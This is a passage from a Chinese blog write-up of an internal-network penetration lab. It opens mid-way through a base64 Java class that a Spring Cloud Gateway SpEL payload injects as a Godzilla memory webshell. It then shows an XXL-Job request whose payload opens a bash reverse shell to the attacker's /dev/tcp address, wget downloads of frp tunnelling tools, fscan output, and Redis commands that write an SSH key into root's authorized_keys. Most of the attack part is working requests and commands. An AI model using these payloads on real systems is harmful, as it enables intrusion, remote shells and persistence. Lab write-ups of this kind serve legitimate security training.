mcvc3ByaW5nZnJhbWV3b3JrL3dlYi9yZWFjdGl2ZS9yZXN1bHQvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA9wcmludFN0YWNrVHJhY2UBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAVZ2V0Q29udGV4dENsYXNzTG9hZGVyAQAZKClMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAKShbTGphdmEvbmV0L1VSTDtMamF2YS9sYW5nL0NsYXNzTG9hZGVyOylWAQARamF2YS9sYW5nL0ludGVnZXIBAARUWVBFAQAHdmFsdWVPZgEAFihJKUxqYXZhL2xhbmcvSW50ZWdlcjsBAAtnZXRJbnN0YW5jZQEAKShMamF2YS9sYW5nL1N0cmluZzspTGphdmF4L2NyeXB0by9DaXBoZXI7AQAIZ2V0Qnl0ZXMBAAQoKVtCAQAXKFtCTGphdmEvbGFuZy9TdHJpbmc7KVYBAARpbml0AQAXKElMamF2YS9zZWN1cml0eS9LZXk7KVYBAAdkb0ZpbmFsAQAGKFtCKVtCAQAbamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0AQAxKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9zZWN1cml0eS9NZXNzYWdlRGlnZXN0OwEABmxlbmd0aAEAAygpSQEABnVwZGF0ZQEAByhbQklJKVYBAAZkaWdlc3QBAAYoSVtCKVYBABUoSSlMamF2YS9sYW5nL1N0cmluZzsBAAt0b1VwcGVyQ2FzZQEAB2Zvck5hbWUBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAJZ2V0TWV0aG9kAQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEAC2dldEZvcm1EYXRhAQAfKClMcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vOwoBbQFuAQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsKABIBbwEABWFwcGx5AQAtKExtcy9HTWVtU2hlbGw7KUxqYXZhL3V0aWwvZnVuY3Rpb24vRnVuY3Rpb247AQAbcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vAQAHZmxhdE1hcAEAPChMamF2YS91dGlsL2Z1bmN0aW9uL0Z1bmN0aW9uOylMcmVhY3Rvci9jb3JlL3B1Ymxpc2hlci9Nb25vOwEAI29yZy9zcHJpbmdmcmFtZXdvcmsvaHR0cC9IdHRwU3RhdHVzAQACT0sBACVMb3JnL3NwcmluZ2ZyYW1ld29yay9odHRwL0h0dHBTdGF0dXM7AQA6KExqYXZhL2xhbmcvT2JqZWN0O0xvcmcvc3ByaW5nZnJhbWV3b3JrL2h0dHAvSHR0cFN0YXR1czspVgEACmdldE1lc3NhZ2UBACZvcmcvc3ByaW5nZnJhbWV3b3JrL3V0aWwvTXVsdGlWYWx1ZU1hcAEACGdldEZpcnN0AQANamF2YS91dGlsL01hcAEAA2dldAEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAJc3Vic3RyaW5nAQAWKElJKUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvQnl0ZUFycmF5AQAEanVzdAEAMShMamF2YS9sYW5nL09iamVjdDspTHJlYWN0b3IvY29yZS9wdWJsaXNoZXIvTW9ubzsHAXAMAXEBdAwAqACpAQAiamF2YS9sYW5nL2ludm9rZS9MYW1iZGFNZXRhZmFjdG9yeQEAC21ldGFmYWN0b3J5BwF2AQAGTG9va3VwAQDMKExqYXZhL2xhbmcvaW52b2tlL01ldGhvZEhhbmRsZXMkTG9va3VwO0xqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvaW52b2tlL01ldGhvZFR5cGU7TGphdmEvbGFuZy9pbnZva2UvTWV0aG9kVHlwZTtMamF2YS9sYW5nL2ludm9rZS9NZXRob2RIYW5kbGU7TGphdmEvbGFuZy9pbnZva2UvTWV0aG9kVHlwZTspTGphdmEvbGFuZy9pbnZva2UvQ2FsbFNpdGU7BwF3AQAlamF2YS9sYW5nL2ludm9rZS9NZXRob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'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping,'/nnmm')}"
    }
        }],
      "uri": "http://example.com"
}

刷新路由

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.100.50:8800
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length:

使用哥斯拉进行连接

http://192.168.100.50:8800/nnmm

连接成功

内网信息收集

还有内网

上传frps代理

python3 -m http.server
wget http://192.168.138.133:8000/frps.ini
wget http://192.168.138.133:8000/frps

上传frc

利用哥斯拉上传太慢,frp上传不是上去

直接利用起python服务,wget下载来把frpc上传上去

wget http://192.168.138.133:8000/frps

这个服务启动代理服务,我们需要重新建里一个代理,启动python服务

POST /run HTTP/1.1
Host: 192.168.138.145:9999
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 365

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "bash -i >& /dev/tcp/192.168.138.133/1235 0>&1",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}

交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
export SHELL=bash
export TERM=xterm-256color
Ctrl-Z
stty raw -echo;fg
reset(回车)

在root目录启动web服务器

在哥斯拉执行命令

wget http://192.168.100.20:8000/frpc
wget http://192.168.100.20:8000/frpc.ini

然后哥斯拉执行./frpc -c frp.ini

这个地方有一个问题就是:

1.哥斯拉需要一层代理

2.两层代理与一层代理不能同时使用

使用fscan 扫描内网

fscan64.exe  -socks5 192.168.138.145:15000 -h 192.168.88.1/24
E:\02-poc\fscan>fscan64.exe  -socks5 192.168.138.145:15000 -h 192.168.88.1/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
Socks5Proxy: socks5://192.168.138.145:15000
start infoscan
192.168.88.70:22 open
192.168.88.60:22 open
192.168.88.70:6379 open
192.168.88.60:8800 open
192.168.88.60:8848 open
[*] alive ports len is: 5
start vulscan
已完成 2/5 [-] webtitle http://192.168.88.60:8848 Get "http://192.168.88.60:8848": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
已完成 4/5 [-] redis 192.168.88.70:6379 123456 socks connect tcp 192.168.138.145:15000->192.168.88.70:6379: read tcp 192.168.138.1:28645->192.168.138.145:15000: wsarecv: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
已完成 5/5
[*] 扫描结束,耗时: 6m12.3565775s

redis服务--redis写入公钥

上面已经获得redis的密码

proxychains redis-cli -h 192.168.88.70 -p 637

登录成功后尝试写入公钥到主机

先在本机生成密钥对

ssh-keygen -t rsa -b 2048

可以设置密码,这里使用空密码

将生成的公钥保存到key.txt

将保存的key.txt内容写入到redis

cat key.txt|proxychains redis-cli -h 192.168.88.70 -a "nbsg@123456" -x set bolean

登录redis:

proxychains redis-cli -h 192.168.88.70 -a "nbsg@123456"

配置目录:

config set dir /root/.ssh/

重命名:

config set dbfilename "authorized_keys"

最后保存即可:

save

远程登录即可

proxychains ssh -i id_rsa root@192.168.88.70

nacos 服务

到此为止,除了二层代理的问题,这是最轻松的一个靶场,不得不说,靶场质量真的不错,奈何驻场的我会的太少。

ka_ka11
关注
  • 27
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Alibaba Nacos权限认证绕过漏洞复现
千寻的博客
01-25 7713
文章目录漏洞描述影响范围漏洞类型环境搭建第一步 下载第二步 解压tai.zip文件第三步 进入解压后的macos的bin目录第四步 清除windows启动脚本第五步 启动单节点模式漏洞复现第一步 访问“查看用户列表”界面第二步 访问添加用户界面,添加用户第三步 登录testa/testqwe保存添加用户的poc,进行利用修复建议摘抄 漏洞描述 2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞
【云原生】SpringCloud Alibaba 之 Nacos注册中心实战
wanghuichen的博客
07-22 5244
什么是 Spring Cloud Alibaba,Nacos又是什么,快速入门Naocs!
r0eXpeR#CVE-2020#Nacos Bypass身份验证1
07-25
Nacos Bypass身份验证影响范围:漏洞验证:访问用户列表界面添加新用户查看用户列表任意密码重置:
Alibaba之Nacos详解
赵树祥的博客
10-15 6392
本文为转载文章,原文作者:Wind Mt 原文链接:https://windmt.com/2018/11/09/intro-to-spring-cloud-alibaba-nacos/ 上个月最后一天的凌晨,Spring Cloud Alibaba 正式入驻了 Spring Cloud 官方孵化器,并在 maven 中央库发布了第一个版本。 目前 Spring Cloud Alibaba 还只能算是预览版吧,里边的坑肯定不少,不过我还是决定试试,看看 Alibaba 到底靠谱不靠谱。 一、Sp.
【漏洞案例】云上攻防-记一次打穿云上内网的攻防实战
Websec
06-28 3362
1.信息收集和思路的转变很重要,有了思路,信息收集似乎是个体力活。2.云服务器别反弹shell,必然会报警,通过cf来执行命令就行;通过云控制台进行远程登陆,应该不会产生报警;fscan在云内网中无脑扫尚不清楚会不会触发报警。3.在一个内网中,如果有多台Linux和少量winserver,直接对winserver进行信息收集价值可能会更大,原因是由于习惯问题,图形化的windows更方便用来管理资产吧~
SpringCloudAlibaba 四、使用 Nacos 作为分布式配置中心
ws - 兮的博客空间
01-18 958
一、Nacos 分布式配置中心说明 1、主流配置中心有哪些? 1、spring-cloud-config, springcloud 自带,不友好,没有后台管理,直接使用git/svn 管理文件 2、Apollo (阿波罗): 太重,部署麻烦,适合大型项目,一般项目使用成本太高 3、Nacos: 轻便,同时支持配置中心和注册中心,部署简单,缺点: 如果配置中心故障那么注册中心就一起挂了 个人推荐还是...
vulntarget靶场系列.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。...
vulntarget-k - 内网渗透
yutianovo的博客
03-13 1271
vulntarget-k 内网渗透
春秋云境-Hospital
最新发布
NoooEmotion的博客
03-24 1266
在这个场景中,你将扮演一名渗透测试工程师,被派遣去测试某家医院的网络安全性。你的目标是成功获取所有服务器的权限,以评估公司的网络安全状况。该靶场共有 4 个flag,分布于不同的靶机。
阿里 Nacos 惊爆,安全漏洞以绕过身份验证(附修复建议)
m0_52987358的博客
01-19 1521
来源:github.com/alibaba/nacos/issues/4701 一、漏洞详情 二、漏洞影响范围 三、漏洞复现 三、 修复建议 BugFix 大家好,我是threedr3am,我发现nacos最新版本1.4.1对于User-Agent绕过安全漏洞的serverIdentity key-value修复机制,依然存在绕过问题,在nacos开启了serverIdentity的自定义key-value鉴权后,通过特殊的url构造,依然能绕过限制访问任何http接口。 通过查看该功能,需要在applic
SpringCloud Alibaba - Nacos 作为配置中心 & 读取Yaml配置信息
恒宇少年De成长之路
03-02 4207
通过本系列的前篇文章: 《SpringCloud Alibaba - Nacos 作为配置中心 & 读取Properties配置信息》 在之前文章中我们学习到了SpringCloud Alibaba读取Nacos Config内定义的properties类型的配置文件信息,并且使用Nacos Console进行修改配置信息后可以在应用程序内实时...
SpringCloud Alibaba系列 Nacos(一)
又逢乱世
10-07 5081
springcloud nacos nacos注册中心 nacos配置中心 nacos配置mysql数据源 nacos开启鉴权
史上最全Spring Cloud Alibaba--Nacos教程(涵盖负载均衡、配置管理、多环境切换、配置共享/刷新、灰度、集群)
博学谷狂野架构师的博客
06-06 1588
能够实现Nacos安装 基于Nacos能实现应用负载均衡 能基于Nacos实现配置管理 配置管理 负载均衡 多环境切换 配置共享 配置刷新 灰度发布 掌握Nacos集群部署 1 Nacos安装 Nacos是Alibaba微服务生态组件中的重要组件之一,主要用它实现应用的动态服务发现、配置管理、服务管理。 https://github.com/alibaba/spring-cloud-alibaba/wiki/Nacos-discovery 1.1 Nacos概要 Nacos是什么 Nacos 致力.
spring cloud alibaba - nacos简介
weixin_38612401的博客
06-23 3075
nacos介绍,nacos的基本使用,nacos的集群部署
最新xray1.9.11高级版下载Windows/Linux
weixin_43167326的博客
12-28 1871
xray 是一款功能强大的安全评估工具,由多名经验丰富的一线安全从业者呕心打造而成,主要特性有: 检测速度快。发包速度快; 漏洞检测算法效率高。 支持范围广。大至 OWASP Top 10 通用漏洞检测,小至各种 CMS 框架 POC,均可以支持。 代码质量高。编写代码的人员素质高, 通过 Code Review、单元测试、集成测试等多层验证来提高代码可靠性。 高级可定制。通过配置文件暴露了引擎的各种参数,通过修改配置文件可以客制化功能。 安全无威胁。xray 定位为一款安全辅助评估工具,而不是攻击工具
Spring Cloud Alibaba Nacos
qq_41505160的博客
07-07 2172
Nacos: 注册中心、配置中心 一、安装Nacos 1. 下载安装nacos 要注意和JDK的版本有无冲突,贼勾8坑,不行就换个低版本的nacos zip下载地址 解压,进入bin目录(nacos\bin),编辑startup.cmd设置为单机启动 set MODE="standalone" 双击startup.cmd启动nacos 2. 登录nacos客户端 账号密码都是nacos 至此nacos已经安装完成 二、做注册中心 nacos discovery 1. 添加依赖 <dependenc
vulnhub渗透日记04:Lampiao
ericalezl的博客
07-16 459
时间:2023.7.16,靶机来自vulnhub,感谢您的查阅arp-scan netdiscover -i eth0 -r 192.168.58.1/24 nmap -sn 192.168.58.1/24 都是可以发现主机的 masscan扫描开放哪些端口 nmap针对开放的端口进一步探测 80端口没啥东西 进入1898 点击图片url有id值 尝试修改 访问audio.m4a是一段音频,说了句 user tiago qrc.png里面是个二维码,扫过没啥用 第三页,有个mp3,咋的还得听首歌呗! 听
springcloudalibaba-nacos配置管理
早日成为鹏总
07-12 477
Nacos除了可以做注册中心,同样可以做配置管理来使用。 Nacos一方面可以将配置集中管理,另一方可以在配置变更时,及时通知微服务,实现配置的热更新。 然后在弹出的表单中,填写配置信息: 注意:项目的核心配置,需要热更新的配置才有放到nacos管理的必要。基本不会变更的一些配置还是保存在微服务本地比较好。 1)引入nacos-config依赖首先,在user-service服务中,引入nacos-config的客户端依赖: 2)添加bootstrap.yaml然后,在user-service中添加一
vulntarget-j
09-18
vulntarget-j 是一种安全测试平台,旨在模拟真实网络环境中的漏洞,以便于安全专业人员进行渗透测试和漏洞分析。该平台提供了一系列虚拟机和漏洞环境,使用户能够模拟并测试真实世界中常见的漏洞攻击。vulntarget-j 不仅可以用于入侵测试,还可以用于培训和教育目的。 vulntarget-j 的虚拟机和漏洞环境包括各种常见的漏洞和安全漏洞,例如操作系统漏洞、Web应用程序漏洞、网络服务漏洞等。用户可以使用这些虚拟机来发起各种类型的攻击,如恶意代码注入、SQL注入、跨站脚本等。除了这些预设的虚拟机,用户还可以创建自己的漏洞环境,以满足特定的安全测试需求。 vulntarget-j 还提供了一个用户友好的界面和工具集,使用户能够轻松配置和管理虚拟机和漏洞环境。用户可以根据自己的需求选择不同的配置选项,并且可以随时修改和更新环境。另外,该平台还提供了详细的文档和教程,帮助用户更好地了解和使用平台功能。 总而言之,vulntarget-j 是一个功能强大且易于使用的安全测试平台,适用于安全专业人员进行渗透测试和漏洞分析。它提供了各种虚拟机和漏洞环境,使用户可以模拟并测试现实世界中的漏洞攻击。此外,它还具有用户友好的界面和工具集,并提供了详细的文档和教程,帮助用户更好地使用平台。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值